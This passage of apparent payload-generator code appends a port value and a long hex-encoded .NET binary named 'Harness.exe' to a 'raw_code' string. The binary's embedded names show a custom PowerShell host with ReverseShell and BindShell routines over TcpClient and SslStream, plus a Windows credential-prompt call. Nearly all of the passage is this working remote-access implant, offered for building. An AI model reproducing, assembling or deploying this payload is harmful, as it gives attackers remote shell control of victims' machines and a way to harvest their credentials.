raw_code += "".join(port_hex) # port
raw_code += "00007d080000040220401f00007d0900000402281200000a000002167d04000004020273100000067d0c00000402281300000a7d0f000004027b0f000004146f1400000a0002027b0c000004027b0f000004281500000a7d0d000004027b0d000004196f1600000a00027b0d0000046f1700000a0002281800000a7d0e000004027b0e000004027b0d0000046f1900000a00002a00133001000c0000000200001100027b0a0000040a2b00062a260002037d0a0000042a0000133001000c0000000300001100027b0b0000040a2b00062a260002037d0b0000042a00001330020031000000040000110073010000060a00066f0700000600067b04000004281a00000a0000067b0400000416fe020b072dde066f08000006002a00000013300400e902000005000011001f5e0a72010000700b720b0000700c72170000700d161304161305721f0000701307721f0000701308020228090000067d030000040202027b03000004027b0100000473500000067d02000004388302000000027b020000046f5300000616fe01130a110a3a6a02000000027b030000046f1b00000a8d340000011306382002000000110416fe01130a110a2d5d00281c00000a11061611096f1d00000a6f1e00000a13081108068c3f00000109281f00000a282000000a16fe01130a110a2d1700021107280d00000600161304721f0000701307002b0d0011071108282100000a130700003869010000110516fe01130a110a3a9e00000000281c00000a11061611096f1d00000a6f1e00000a130811086f2200000a08282000000a16fe01130a110a2d5700282300000a1107282400000a6f2500000a1307021107280b00000616fe01130a110a2d0d00021107280d00000600002b1800027b0c0000046f2600000a72210000706f2700000a0000721f0000701307161305002b140011071108282100000a1307721f0000701308000038bd00000000281c00000a11061611096f1d00000a6f1e00000a130711076f2200000a7279000070282000000a2d1611076f2200000a7283000070282000000a16fe012b011600130a110a2d0d0002167d0400000438da00000011076f2200000a07282000000a16fe01130a110a2d0c00171305721f0000701307001107282800000a2d0411052b011700130a110a2d30001107166f2900000a06fe0116fe01130a110a2d1a00021107280c000006130a110a2d03002b7c721f00007013070000001105130a110a2d4500021107280b00000616fe01130a110a2d1700021107280d00000600721f0000701307161304002b1b00171304027b0c0000046f2600000a728d0000706f2a00000a00000000027b0200000411061611068e696f5500000625130916fe0116fe01130a110a3abcfdffff027b030000046f2b00000a002b130002280200000616fe01130a110a3a6bfdffff2a6a00027b0d0000046f2c00000a00027b0e0000046f2d00000a002a1b300300380000000600001100732e00000a0a00027b06000004732f00000a0b0607027b080000046f3000000a0000de0c0c0017283100000a0000de0000060d2b00092a01100000000007001e25000c430000011b300200460000000700001100027b07000004732f00000a0a06027b09000004733200000a0b076f3300000a00140c00076f3400000a0c081304de120d0017283100000a0000de00000813042b000011042a000001100000000023000d30000c43000001133002002b0000000800001100733500000a0a031200283600000a0b066f3700000a16fe0216fe010d092d0500160c2b04170c2b00082a0013300400690300000900001100721f0000700a170b0317036f3800000a17596f3900000a1001036f2200000a178d3f000001130f110f161f209d110f6f3a00000a100103178d3f000001130f110f161f209d110f6f3b00000a0c08169a1310111039eb02000011107295000070282000000a2d21111072b1000070282000000a2d25111072cf000070282000000a2d2938bc02000002177d0500000472db0000700a38aa02000002167d0500000472050100700a3898020000283c00000a0d72330100701307088e6918fe0116fe01131111113a900100000008179a166f2900000a1f2bfe0116fe01131111113a6c0100000008179a08179a6f3800000a17596f2900000a131211121f68301111121f642e2211121f682e67383d01000011121f6d3ba400000011121f733be3000000382601000008179a1708179a6f3800000a18596f3900000a1208283d00000a16fe01131111112d2300283c00000a131312131108283e00000a13131213fe16480000016f3f00000a13070038db00000008179a1708179a6f3800000a18596f3900000a1209283d00000a16fe01131111112d2300283c00000a131312131109284000000a13131213fe16480000016f3f00000a130700389000000008179a
1708179a6f3800000a18596f3900000a120a283d00000a16fe01131111112d2300283c00000a13131213110a284100000a13131213fe16480000016f3f00000a1307002b4808179a1708179a6f3800000a18596f3900000a120b283d00000a16fe01131111112d2300283c00000a13131213110b284200000a13131213fe16480000016f3f00000a1307002b00002b070008179a130700002b23088e6919fe0116fe01131111112d140008179a724701007008189a284300000a13070011071204284400000a16fe01131111113a9b00000000110409284500000a130c120c284600000a230000000000000000fe0416fe01131111112d1900120c230000000000003840284700000a284800000a130c00120c284600000a130d110d284900000a13051203110d284a00000a13061205fe164a0000016f3f00000a0a724b01007006726f0100701206fe16480000016f3f00000a284b00000a0a02120c284600000a697d04000004160b002b1400729701007011076f3f00000a282100000a0a002b00027b0c0000046f2600000a0672d1010070282100000a6f2a00000a0007130e2b00110e2a00000013300400ea0000000a0000110003282800000a0d093a8900000000027b0e000004036f4c00000a26027b0500000416fe010d092d1300027b0e00000472d70100706f4d00000a2600734e00000a0a0602fe060e000006734f00000a6f5000000a00027b0e0000046f5100000a6f5200000a02fe060f000006734f00000a6f5300000a00027b0e00000414066f0100002b0b2b020000076f5500000a16fe010d092df100027b0e0000046f5600000a6f5700000a6f5800000a6f5900000a6f3f00000a0c027b0c0000046f2600000a72ed0100700872f5010070284300000a6f2a00000a00027b0e0000046f5a00000a6f5b00000a002a00001b3002005b0000000b0000110003740200001b0a066f5c00000a0b00076f5d00000a0d2b20096f5e00000a0c00027b0c0000046f2600000a086f3f00000a6f2700000a0000096f5f00000a130411042dd4de120914fe01130411042d07096f6000000a00dc002a00011000000200170030470012000000001b300200750000000c00001100027b0e0000046f5100000a6f5200000a6f6100000a0a027b0e0000046f5100000a6f5200000a6f6200000a0000066f6300000a0c2b20086f6400000a0b00027b0c0000046f2600000a076f3f00000a6f6500000a0000086f5f00000a0d092dd6de100814fe010d092d07086f6000000a00dc002a00000001100000020035002e63001000000000b602286600000a7d1100000402286700000a000002037d1000000402027b10000004731c0000067d12000004002a0000133001000c0000000d00001100027b110000040a2b00062a133001000b0000000e0000110072fb0100700a2b00062a00133002000d0000000f000011001716736800000a0a2b00062a000000133001000c0000001000001100027b120000040a2b00062a13300100100000001100001100286900000a6f6a00000a0a2b00062a13300100100000001100001100286900000a6f6b00000a0a2b00062a3200720b020070736c00000a7a3200725b020070736c00000a7a12002b002a12002b002a7a00027b10000004176f0300000600027b10000004036f05000006002b002a7202734f0000067d1400000402286d00000a000002037d13000004002a13300400420000001200001100027b130000047b020000046f5400000616fe010b072d2900282300000a036f3f00000a6f6e00000a0a027b130000047b020000040616068e696f5600000600002a3a000272a7020070281d000006002a2a000203281d000006002a5200020572a7020070282100000a281d000006002a2a000205281d000006002a2a000203281d000006002a66000272ab0200700372a7020070284300000a281d000006002a66000272bb0200700372a7020070284300000a281d000006002a66000272cb0200700372a7020070284300000a281d000006002a66000272df0200700372a7020070284300000a281d000006002a12002b002a133001000b0000000e0000110072470100700a2b00062a001b300500a40000001300001100020372a7020070047247010070284b00000a6f2a00000a00736f00000a0a00056f7000000a13052b4d11056f7100000a0b00076f7200000a282b0000060c0208179a6f2700000a00026f7300000a0d0914fe0116fe01130611062d0600141304de3d06076f7400000a09287500000a6f7600000a000011056f5f00000a130611062da6de14110514fe01130611062d0811056f6000000a00dc000613042b000011042a01100000020028005e8600140000000013300600fe0000001400001100020372a70200700472a7020070284b00000a6f2700000a0005282c0000060a737700000a0b160c2b27000772f302007006160
8287800000a061708287800000a287900000a6f7a00000a26000817580c08056f7b00000afe04130611062dca07720903007006160e04287800000a287c00000a6f7a00000a262b7a0002076f3f00000a6f2700000a00026f7300000a0d09282800000a16fe01130611062d07000e0413052b541613042b270006161104287800000a09282000000a16fe01130611062d0700110413052b2f001104175813041104056f7b00000afe04130611062dc902722b03007009282100000a6f6500000a00001713062b8111052a0000133005008e0000001500001100188d3e0000010d09167e7d00000aa209177e7d00000aa2090a02178d3f00000113041104161f269d11046f3b00000a0b078e6918fe0116fe01130511052d420007179a6f3800000a16fe0216fe01130511052d1700061607179a166f2900000a13061206287e00000aa200061707169a07179a282100000a6f1e00000aa2002b0600061702a200060c2b00082a00001330050055000000160000110018026f7b00000a737f00000a0a160b2b2e0002076f8000000a6f8100000a282b0000060c06160708169a288200000a06170708179a288200000a000717580b07026f7b00000afe04130411042dc3060d2b00092a000000133009006001000017000011001200fe15050000021200037d180000041200047d1700000412007e8400000a7d160000041200068c05000002288500000a7d15000004160b1202fe155900000120000400000d161304724d0300701305738600000a130612001612017e8400000a1612021203120417282f00000613081f64738700000a13091f64738700000a130a1f64738700000a130b1f64130c1f64130d1f64130e110816fe0116fe01131011103aa2000000001608091109120c110b120d110a120e282e00000616fe01131011102d750008282d00000600110b6f3f00000a130505282800000a131011102d19001105726503007011096f3f00000a284300000a1003002b0b0011096f3f00000a100300110a6f3f00000a6f8800000a1106fe068900000a738a00000a280200002b0011066f8c00000a00051106738d00000a1307002b0c00051106738d00000a130700002b0c00051106738d00000a1307001107130f2b00110f2a13300500110000001800001100020304050e046f8e00000a0a2b00062a000000133001000c0000001900001100027b140000040a2b00062a133004005e0000001a00001100027b130000047b030000046f1b00000a8d340000010b721f0000700c2b1600281c00000a0716066f1d00000a6f1e00000a0c2b23027b130000047b020000040716078e696f55000006250a16fe0116fe01130411042dc7080d2b00092a32007269030070736c00000a7a00133001000c0000001b00001100027b1e0000040a2b00062a260002037d1e0000042a0000133001000c0000001c00001100027b210000040a2b00062a260002037d210000042a0000133001000c0000001d00001100027b1b0000040a2b00062a260002037d1b0000042a0000133001000c0000000300001100027b1c0000040a2b00062a260002037d1c0000042a320072bf030070736c00000a7a00133001000c0000001b00001100027b1d0000040a2b00062a260002037d1d0000042a32007209040070736c00000a7a32007255040070736c00000a7a133001000c0000001c00001100027b1f0000040a2b00062a133001000c0000001c00001100027b200000040a2b00062a32007297040070736c00000a7a320072cf040070736c00000a7a3200721f050070736c00000a7a3200726b050070736c00000a7a133001000c0000001d00001100027b220000040a2b00062a260002037d220000042a0000133001000c0000001c00001100027b1a0000040a2b00062a260002037d1a0000042a0000133001000c0000000e00001100027b230000040a2b00062a260002037d230000042a000013300300020100001e000011021200fe151a00000112001f78289000000a0012001f64289100000a00067d1a000004021201fe151b000001120116289200000a00120116289300000a00077d1b00000402177d1c000004021f0f7d1d00000402167d1e000004021202fe151a000001120220ffffff7f289000000a00120220ffffff7f289100000a00087d1f000004021203fe151a00000112031f64289000000a0012031f64289100000a00097d20000004021204fe151a00000112041f64289000000a00120420e8030000289100000a0011047d21000004021205fe151b000001120516289200000a00120516289300000a0011057d220000040272470100707d2300000402289400000a002a000013300500750000000200001102281200000a00000516fe010a062d4e0002046f9500000a1602fe0651000006739600000a14739700000a7d2500000402037d27000004027b2500000402027b270000047b
0600000428520000066f9800000a0002177d26000004002b150002046f9500000a7d2400000402167d2600000400002a00000013300100070000000200001100170a2b00062a00133003004e0000001f00001100721f0000700a160b2b33000603078f34000001289900000a282100000a0a07038e691759fe010d092d0e000672b5050070282100000a0a00000717580b07038e69fe040d092dc3060c2b00082a0000133002002e0000002000001100027b2600000416fe010b072d0f00027b250000046f9a00000a0a2b0f00027b240000046f9a00000a0a2b00062a0000133002002e0000002000001100027b2600000416fe010b072d0f00027b250000046f9b00000a0a2b0f00027b240000046f9b00000a0a2b00062a000013300400380000002100001100027b2600000416fe010b072d1400027b250000040304038e696f9c00000a0a2b1400027b240000040304038e696f9c00000a0a2b00062a13300400370000000200001100027b2600000416fe010a062d1500027b250000040304038e696f9d00000a00002b1300027b240000040304038e696f9d00000a00002a0042534a4201000100000000000c00000076322e302e35303732370000000005006c00000068110000237e0000d41100007c15000023537472696e67730000000050270000bc050000235553000c2d00001000000023475549440000001c2d00007406000023426c6f6200000000000000020000015715a23d090a000000fa2533001600000100000060000000080000002800000056000000670000009d0000000d0000002100000004000000150000001f000000020000000e00000004000000010000000100000003000000040000000200000000000a0001000000000006008c0085000a00d200b0000a00d900b0000600ed0085000a00f700b0000e002f011c010a00bf0198010a00d30193000a00e10198010a00800293000600d20285000600fb02850006002b03160306000b0485000a005e0493000600a10486040a00ae0493000600d604b7040a00e304b0000a00fb04b0000600640558050a00d00593000a00f10593000a000306930006003c062c060a00a706b0000a00b806b0000a001408b0000a001f08b0000a007808b0000a008008b0000e00be091c010e00ed09d9090600330a050a0e00430a050a0e004d0ad9090600180cf90b06002e0d1c0d0600450d1c0d0600620d1c0d0600810d1c0d06009a0d1c0d0600b30d1c0d0600ce0d1c0d0600e90d1c0d0600020ef90b0600160ef90b0600240e1c0d06003d0e1c0d06007a0e5a0e06009a0e5a0e0600b80e85000600020f5a0e0600310f5a0e0600400f85000600460f85000a00770f93000a00a50f98010a00c40f980106001010ff0f06003310580506005010850006005c1085000600851085000e00cf10c4100600e11085000600f21085000e00fc101c010a001e1193000a002b1193000a00341193000600721185000600831185000600c31185000a00351293000600481285000a00651293000a007f1293000600951285000a00cb1298010a00f31293000a000b1393000a0032139300060057138604060092137f130600a71385000600cd13850006003114f90b06005914850006006514f90b06008b1485000600a914f90b0600bf14f90b0e00f514d9090600231519150e002a15d90900000000010000000000010001000100100016001600050001000100030010001e000000090010001000030010002b0000000d0013001c000b01120045000000110015003600030010005100000015001a003600010010006f00160005002400500000000000bd0e000005002800570001000e011300060015011600010039011a00010040011e0001004601130006004d01210006005c01210006006a011e00060075011e0001007f01130001008a011e000100930125000100c80129000100de012d000100f50131000100ca026f000100d70273000100df0277000100ca026f000100ef03b10006006d061e0006007406540106007f06570106008e06570106009d0654010100ac065a010100c4065e010100d4061e000100e00662010100f1066201010002075a01010019075a01010028075a01010034075e010100440757010100cc09cc010100f709d10101000e0113000100ca026f0013011d0f1e005420000000008118fb01350001002c21000000008608010239000100442100000000860810023d00010050210000000086081f024200020068210000000086082c0246000200742100000000910039024b000300b4210000000081003e0235000400a924000000008100420235000400c4240000000081004a025100040018250000000081005702510004007c25000000008100610256000400b4250000000081006902560005002c2900000000810076025b000600242a0000000081009302600007009c2a000000008100a60260000
900302b000000008618fb017b000b00602b00000000c608e30281000c00782b00000000c608f20286000c00902b00000000c60803038a000c00ac2b00000000c6080f038f000c00c42b00000000c608370394000c00e02b00000000c6084a0394000c00fc2b00000000c6005f0335000c00092c00000000c600710335000c00162c00000000c600820335000c001b2c00000000c600990335000c00202c00000000c600ae0346000c003f2c000000008618fb017b000d005c2c000000008100f6035b000e00aa2c00000000c600010435000f00b92c00000000c60001045b000f00c42c00000000c6000104b5001000d92c00000000c6001804b5001300e42c00000000c60018045b001600ef2c00000000c6001e045b001700092d00000000c6002d045b001800232d00000000c6003c045b0019003d2d00000000c6004d045b001a00572d00000000c6006d04be001b005c2d0000000086087b0486001d00742d00000000c600f404c5001d00342e00000000c6000d05d7002000402f0000000091001d05e4002400dc2f0000000091002f05ea00250000000000800096204a05fa00260000000000800091207205ff00270000000000800091209105120130000000000080009120b30525013900403000000000c600dd052f013e00ac3100000000c600dd0538014200cc3100000000c608190645014800e43100000000c6002306860048004e3200000000c60049064a0148005c3200000000c608510766014800743200000000c60865076b014800803200000000c608790771014900983200000000c608880776014900a43200000000c60897077c014a00bc3200000000c608aa0781014a00c83200000000c608bd0742004b00e03200000000c608cc0746004b00ea3200000000c600db0735004c00f83200000000c608ec0766014c00103300000000c60800086b014c001a3300000000c600290887014d00273300000000c6083b0839004e00343300000000c6084c0871014e004c3300000000c608660871014e00643300000000c6008f0894014e00713300000000c60097089b014f007e3300000000c600ac08a70153008b3300000000c600ac08af015500983300000000c608be087c015700b03300000000c608d10881015700bc3300000000c608e40871015800d43300000000c608f30876015800e03300000000c608020986005900f83300000000c60812095b0059000434000000008618fb0135005a001435000000008618fb01d6015a0098350000000081005d0adf015d00ac35000000008100770aed0161000836000000008600890a390062004436000000008600910a3900620080360000000086009a0af3016200c4360000000086001804fb016500000001009f0a000001009f0a00000100a50a00000100aa0a00000100af0a00000100aa0a00000100b30a00000200ba0a00000100b30a00000200ba0a00000100ca02000001008a0100000100ca0200000100bc0a000001009f0a00000100c30a00000200d30a000003009f0a00000100c30a00000200d30a000003009f0a000001009f0a000001009f0a000001009f0a00000100e30a00000100e30a00000100eb0a00000200f40a00000100fb0a00000200e30a00000300030b00000100fb0a00000200e30a00000300100b00000400180b00000100260b00000100100b000001002c0b00000100300b00000200380b00000300440b00000400510b000005005d0b000006006d0b000007007b0b000008008c0b00000900980b00000100a80b00000200b40b00000300be0b00000400ca0b00000500d70b02000600e80b02000700250c000008003a0c00000900400c00000100300b00000200510b000003008c0b00000400460c00000500590c00000100fb0a00000200e30a000003006e0c00000400770c00000100fb0a00000200e30a000003006e0c00000400770c00000500820c00000600990c000001009f0a000001009f0a000001009f0a000001009f0a000001009f0a00000100a10c00000100990c00000100ab0c00000200b20c00000300be0c00000400c30c00000100a10c00000200c30c00000100c80c00000200cf0c000001009f0a000001009f0a000001009f0a00000100ca02000002003901000003000e0100000100b30a00000200d80c00000300e40c00000400ea0c00000100fa0c00000100010d00000200070d00000300090d00000100100d00000200070d00000300090d2901fb0135003101fb015b003901fb015b004101fb015b004901fb015b005101fb015b005901fb015b006101fb015b006901fb015b007101fb013d007901fb015b008101fb015b008901fb015b009101fb0146009901fb013500a901fb013500b101590f08020900fb0135004900690f120249008c0f1702d101b50f1e023900d40f27023900e60f35004100eb0f2e024100f20f3302e1011710460231001d104200e901
3c105102e90146105702f10157108600f10161105f02f10168106502f10161106b02f10174108600e9017c10510201028d107102e9014610ed0111000f038f00190001045b00f1019e107702f101ac107c02190018045b003100b61035003900bc1035004100bc1035003100fb0135000902fb0190023100d91096021102ed1046022102fb01960221020811350021020e1151000c00fb01350031023c11c3020c0045114200f1014f114200f1015a11e902f1016411ef02f1016c11f50241027b11fc0249028a11020341029311090309009b1186004102a41109034102ad1109034102b8110903f1016110100341028a1117034102cc1120035102db112c035102f11130035102fb1137035102ff113003410210120903f10161104003410020126d0341002a126d031400fb0135001c00fb01830314005712890341007312940369028b129a032400571289034100a212ae037902ae1239004100be12ca033900dd12cf0381020213d50389021413db0341003c13e10399024913350014004f13f6032c0065130604340073131804a9029e133900b102bc10350024004f13f6032400491335003c006513060444007313180419002d045b005900b3135e041100fb0135006100fb016c04e101bb137c04e10137039400e1014a039400b902fb015b001900fb013500e901e51387044c00fb0135005400651306045c00731318049900ee1386001900230686009900f20286008900f813aa044c000314b004a900fb01350064000c14e902f1011014de04a9001714e5046c0045114200f1011014f204f1011e145701f9019b1186006400fb016c046c0024141805a100ee13860064002d141e05c102fb015b00c90260145401d1026d143a05c900fb013500a900fb014600f10174143f05c900801444057400fb018303b90194145005c9009c143500b100fb0163051900dd052f01e102fb019805d100ca144600d100d4144600d900df144600d900e51446002900fb0135003100eb14bd05f102fb0183030901fb01c30509014c155b00a1019b118600f90261153900f9026d153900f9029a0af301f9021804fb012e003b00fa052e007b0052062e001b00f4052e002300f4052e002b00f4052e003300f4052e001300e2052e004300f4052e005300f4052e005b0012062e006b003c062e007300490603018300030239023e0242024b0281029e02ab02d6024803e7031d044804630468047204770482048d04b804f804090525056a0585058a058f059f05a405a905ae05d105d805dd0502000100030003000400090006000b000000b60267000000c1026b000000bc0399000000c7039e000000fb02a2000000cc03a7000000cf03ac000000de03ac00000060069e00000067064f0100002209bd0100003209c20100003d09c70100004c096b0000005709bd0100006709670000007409c20100008a09c20100009809c7010000a709c2010000b2099e00020002000300010003000300020004000500010005000500020011000700020012000900020013000b00020014000d00020015000f0002001600110002002800130002003300150002003600170001003700170001003900190002003800190002003a001b0001003b001b0002003c001d0001003d001d0002003f001f00010040001f0002004200210002004300230002004400250001004a00270002004900270001004c00290002004b00290002004d002b0001004e002b0044144e14bb0273037b03a503ff03100437043f0493049b04a204d604eb04490500015b004a05010006015d007205020006015f009105020046016100b30502005020000028000480000001000000000000000000000000001600000002000000000000000000000001007c00000000000100000000000000000000000a00930000000000020000000000000000000000010085000000000003000200040002000500040006000200a900c30317015f050000003c4d6f64756c653e004861726e6573732e657865004861726e65737300437573746f6d5053486f737400437573746f6d5053486f737455736572496e74657266616365004352454455495f494e464f00437573746f6d505352486f737452617755736572496e7465726661636500437573746f6d53747265616d006d73636f726c69620053797374656d004f626a6563740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e0053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e486f7374005053486f7374005053486f737455736572496e746572666163650056616c756554797065005053486f737452617755736572496e74657266616365005345435552450073747265616d0053797374656d2e4e65742e536f636b65747300546370436c69656e7400636c69656e7400736c65657000464f524d41540072656d6f746549505f6279746573006c6
f63616c49505f62797465730072656d6f7465506f7274006c6f63616c506f72740073686f756c64457869740065786974436f646500686f73740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e52756e7370616365730052756e7370616365006d7952756e537061636500506f7765725368656c6c00707300496e697469616c53657373696f6e5374617465007374617465002e63746f72006765745f53686f756c6445786974007365745f53686f756c6445786974006765745f45786974436f6465007365745f45786974436f6465004d61696e0052756e00436c65616e557000526576657273655368656c6c0042696e645368656c6c00497356616c69640050726f636573734c6f63616c0050726f636573735053004461746141646465644576656e74417267730050534f75747075745f446174614164646564004572726f725f4461746141646465640053686f756c64457869740045786974436f64650070726f6772616d0047756964005f686f73744964005f7569006765745f496e7374616e63654964006765745f4e616d650056657273696f6e006765745f56657273696f6e006765745f55490053797374656d2e476c6f62616c697a6174696f6e0043756c74757265496e666f006765745f43757272656e7443756c74757265006765745f43757272656e74554943756c7475726500456e7465724e657374656450726f6d707400457869744e657374656450726f6d7074004e6f74696679426567696e4170706c69636174696f6e004e6f74696679456e644170706c69636174696f6e0053657453686f756c644578697400496e7374616e63654964004e616d650055490043757272656e7443756c747572650043757272656e74554943756c74757265005f72617755690053656e644f75747075740057726974654c696e6500436f6e736f6c65436f6c6f7200577269746500577269746544656275674c696e650057726974654572726f724c696e65005772697465566572626f73654c696e650057726974655761726e696e674c696e650050726f67726573735265636f726400577269746550726f6772657373006765745f4f75747075740053797374656d2e436f6c6c656374696f6e732e47656e657269630044696374696f6e61727960320050534f626a6563740053797374656d2e436f6c6c656374696f6e732e4f626a6563744d6f64656c00436f6c6c656374696f6e6031004669656c644465736372697074696f6e0050726f6d70740043686f6963654465736372697074696f6e0050726f6d7074466f7243686f69636500476574486f746b6579416e644c6162656c004275696c64486f746b657973416e64506c61696e4c6162656c7300436f5461736b4d656d467265650053797374656d2e5465787400537472696e674275696c6465720043726564556e5061636b41757468656e7469636174696f6e4275666665720043726564554950726f6d7074466f7257696e646f777343726564656e7469616c7300437265645061636b41757468656e7469636174696f6e42756666657200505343726564656e7469616c0050726f6d7074466f7243726564656e7469616c00505343726564656e7469616c547970657300505343726564656e7469616c55494f7074696f6e73006765745f526177554900526561644c696e650053797374656d2e536563757269747900536563757265537472696e6700526561644c696e654173536563757265537472696e67004f757470757400526177554900636253697a650068776e64506172656e740070737a4d657373616765546578740070737a43617074696f6e546578740068626d42616e6e65720053697a65005f77696e646f7753697a6500436f6f7264696e61746573005f637572736f72506f736974696f6e005f637572736f7253697a65005f666f726567726f756e64436f6c6f72005f6261636b67726f756e64436f6c6f72005f6d6178506879736963616c57696e646f7753697a65005f6d617857696e646f7753697a65005f62756666657253697a65005f77696e646f77506f736974696f6e005f77696e646f775469746c65006765745f4261636b67726f756e64436f6c6f72007365745f4261636b67726f756e64436f6c6f72006765745f42756666657253697a65007365745f42756666657253697a65006765745f437572736f72506f736974696f6e007365745f437572736f72506f736974696f6e006765745f437572736f7253697a65007365745f437572736f7253697a6500466c757368496e707574427566666572006765745f466f726567726f756e64436f6c6f72007365745f466f726567726f756e64436f6c6f720042756666657243656c6c0052656374616e676c6500476574427566666572436f6e74656e7473006765745f4b6579417661696c61626c6500676574
5f4d6178506879736963616c57696e646f7753697a65006765745f4d617857696e646f7753697a65004b6579496e666f00526561644b65794f7074696f6e7300526561644b6579005363726f6c6c427566666572436f6e74656e747300536574427566666572436f6e74656e7473006765745f57696e646f77506f736974696f6e007365745f57696e646f77506f736974696f6e006765745f57696e646f7753697a65007365745f57696e646f7753697a65006765745f57696e646f775469746c65007365745f57696e646f775469746c65004261636b67726f756e64436f6c6f720042756666657253697a6500437572736f72506f736974696f6e00437572736f7253697a6500466f726567726f756e64436f6c6f72004b6579417661696c61626c65004d6178506879736963616c57696e646f7753697a65004d617857696e646f7753697a650057696e646f77506f736974696f6e0057696e646f7753697a650057696e646f775469746c65004e6574776f726b53747265616d00636c6561725f73747265616d0053797374656d2e4e65742e53656375726974790053736c53747265616d007365637572655f73747265616d0053797374656d2e53656375726974792e43727970746f6772617068792e58353039436572746966696361746573005835303943657274696669636174650058353039436861696e0053736c506f6c6963794572726f72730056616c69646174655365727665724365727469666963617465004279746573546f49507634537472696e670043616e526561640043616e577269746500526561640076616c75650061726773006461746100636d640073656e6465720065006f757470757400666f726567726f756e64436f6c6f72006261636b67726f756e64436f6c6f72006d65737361676500736f757263654964007265636f72640063617074696f6e006465736372697074696f6e730063686f696365730064656661756c7443686f69636500696e70757400707472006477466c616773007041757468427566666572006362417574684275666665720070737a557365724e616d6500706363684d6178557365724e616d650070737a446f6d61696e4e616d6500706363684d6178446f6d61696e616d650070737a50617373776f726400706363684d617850617373776f7264006e6f74557365644865726500617574684572726f7200617574685061636b61676500496e4175746842756666657200496e4175746842756666657253697a65007265664f7574417574684275666665720053797374656d2e52756e74696d652e496e7465726f705365727669636573004f7574417474726962757465007265664f75744175746842756666657253697a6500665361766500666c61677300705061636b656443726564656e7469616c73007063625061636b656443726564656e7469616c7300757365724e616d65007461726765744e616d6500616c6c6f77656443726564656e7469616c5479706573006f7074696f6e730072656374616e676c6500736f757263650064657374696e6174696f6e00636c69700066696c6c006f726967696e00636f6e74656e747300636572746966696361746500636861696e0073736c506f6c6963794572726f7273006261727261790062797465730078004c656e677468006f757470757442797465730053797374656d2e5265666c656374696f6e00417373656d626c795469746c6541747472696275746500417373656d626c794465736372697074696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c79436f6d70616e7941747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7943756c7475726541747472696275746500436f6d56697369626c65417474726962757465004775696441747472696275746500417373656d626c7956657273696f6e41747472696275746500417373656d626c7946696c6556657273696f6e4174747269627574650053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650042797465003c50726976617465496d706c656d656e746174696f6e44657461696c733e7b42413132413632352d413932322d343233372d413330412d3834353745373034343734337d00436f6d70696c657247656e6572617465644174747269627574650024246d6574686f643078363030303030312d310052756e74696d6548656c70657273004
1727261790052756e74696d654669656c6448616e646c6500496e697469616c697a6541727261790043726561746544656661756c7400417574686f72697a6174696f6e4d616e61676572007365745f417574686f72697a6174696f6e4d616e616765720052756e7370616365466163746f72790043726561746552756e73706163650050535468726561644f7074696f6e73007365745f5468726561644f7074696f6e73004f70656e00437265617465007365745f52756e73706163650053797374656d2e546872656164696e670054687265616400536c656570006765745f5265636569766542756666657253697a6500456e636f64696e67006765745f415343494900476574537472696e6700537472696e67005472696d004368617200436f6e636174006f705f457175616c69747900546f4c6f776572006765745f5554463800436f6e766572740046726f6d426173653634537472696e670049734e756c6c4f72456d707479006765745f436861727300436c6f736500446973706f73650053797374656d2e4e65740049504164647265737300436f6e6e65637400456e7669726f6e6d656e74004578697400457863657074696f6e005463704c697374656e657200537461727400416363657074546370436c69656e7400505350617273654572726f72005053506172736572005053546f6b656e00546f6b656e697a65006765745f436f756e74006765745f4c656e67746800537562737472696e67005472696d456e640053706c6974004461746554696d65006765745f4e6f7700446f75626c65005472795061727365004164644461797300546f537472696e6700416464486f757273004164644d696e75746573004164645365636f6e64730054696d655370616e006f705f5375627472616374696f6e006765745f546f74616c4d696c6c697365636f6e64730046726f6d486f757273004164640046726f6d4d696c6c697365636f6e6473004164644d696c6c697365636f6e64730041646453637269707400416464436f6d6d616e6400505344617461436f6c6c656374696f6e6031004576656e7448616e646c65726031006164645f4461746141646465640050534461746153747265616d73006765745f53747265616d73004572726f725265636f7264006765745f4572726f7200494173796e63526573756c7400426567696e496e766f6b65006765745f4973436f6d706c65746564006765745f52756e73706163650053657373696f6e537461746550726f7879006765745f53657373696f6e537461746550726f78790050617468496e7472696e73696373006765745f506174680050617468496e666f006765745f43757272656e7446696c6553797374656d4c6f636174696f6e005053436f6d6d616e64006765745f436f6d6d616e647300436c6561720052656164416c6c0049456e756d657261746f72603100476574456e756d657261746f72006765745f43757272656e740053797374656d2e436f6c6c656374696f6e730049456e756d657261746f72004d6f76654e6578740049446973706f7361626c65004e657747756964006765745f43757272656e74546872656164004e6f74496d706c656d656e746564457863657074696f6e004765744279746573006765745f4c6162656c00417350534f626a656374007365745f4974656d0047657400466f726d617400417070656e6400456d707479006765745f4974656d0053657400446c6c496d706f7274417474726962757465006f6c6533322e646c6c006372656475692e646c6c00496e74507472005a65726f004d61727368616c0053697a654f6600546f43686172417272617900417070656e644368617200416374696f6e603100466f7245616368004d616b65526561644f6e6c79005374727563744c61796f7574417474726962757465004c61796f75744b696e64007365745f5769647468007365745f486569676874007365745f58007365745f590047657453747265616d0052656d6f7465436572746966696361746556616c69646174696f6e43616c6c6261636b0053797374656d2e494f0053747265616d004c6f63616c436572746966696361746553656c656374696f6e43616c6c6261636b0041757468656e7469636174654173436c69656e74006765745f43616e52656164006765745f43616e577269746500000000093c00720066003e00000b3c002f00720066003e00000765006e006400000100575b0021005d0020005400720061006e00730066006500720020006500720072006f0072007300200066006f0075006e0064002e002000540072007900200069006d0070006f0072007400200061006700610069006e00000965007800690074000009710075006900740000073e003e002000001b65006e00610062006c0065002d0066006f0072006d0061007400011d64006900
